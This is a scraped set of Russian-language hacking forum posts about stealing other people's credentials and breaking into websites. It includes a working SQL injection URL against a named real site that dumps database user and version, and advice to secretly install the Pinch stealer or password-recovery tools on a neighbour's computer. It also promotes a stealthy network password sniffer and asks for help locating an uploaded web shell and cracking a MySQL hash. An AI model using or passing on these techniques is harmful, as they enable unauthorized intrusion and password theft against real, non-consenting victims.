1значение переменной вообще может не фигурировать в запросе, что общего между: и 2 и это не обязательно лимит, например where lala=1,-20,10 :add sql inj здесь не прокатит
Так,активировал телнет серв на компе.При коннекти по 3389-ому порту выдаёт следующее: Вход в систему невозможен из-за ограничений учётной записи Каких ограничений ? =_=.Проверку делал,когда чел был в логоффе и в онлайне.Фаир и антивирь отключен,ибо это точно не из-за них.
У меня с моим соседом стоит сетка через хаб, и у него безлимитка, хочу узнать его логи и пасс на инет
Gema ktools.net/forum - есть форум но видемо база другая.. 777DEMYAN777 приди к нему домой... мол фильмы посмотреть, пока он ушел делать чай.. закинь password recovery.. или того же самого пинча подкинь... DJ ][akep логический вывод 4 версия... можешь не продолжать )
Code: http://ktools.net/news_detail.php?nid=1+union+select+1,2,concat_ws(0x40,user(),database(),version()),4,5-- Бруть таблицы ..SIPT'ом например
Шпионская программа для платформы Windows, предназначенная для перехвата паролей в локальной сети. Программа умеет прослушивать Сеть и позволяет захватывать пароли любого сетевого пользователя через FTP, POP3, HTTP, SMTP, Telnet протоколы. Ace Password Sniffer при работе не создаёт никакого трафика в сети, поэтому Вы не будете обнаружены другими пользователями сети.. Скачать тут . Пробуй...
Мужики, нарыл на одном сайте скрипт filemanager.php , дает залить на сервак файл (шелл), но хоть убей не могу найти куда он его льет. Примерная структура сайта есть.. Не хочу светить сайт - с помощью прошу в л/с
Доброе время суток,кто подскажет,что за шифрование? *a1909ea3a9dbd4bb8713d01188e5da99f971817f и если можно,то и пасс нехэшированный
Это mysql или SHA1 хеш. Отличить их нельзя так как одинаковы по формату, но обычно эта звёздочка впереди обозначает что это все же мускульный хеш (MySQL_160bit)
Помогите!!! Имею полный доступ к компу, как вытянуть пароли на инет с него, если юзер их не сохраняет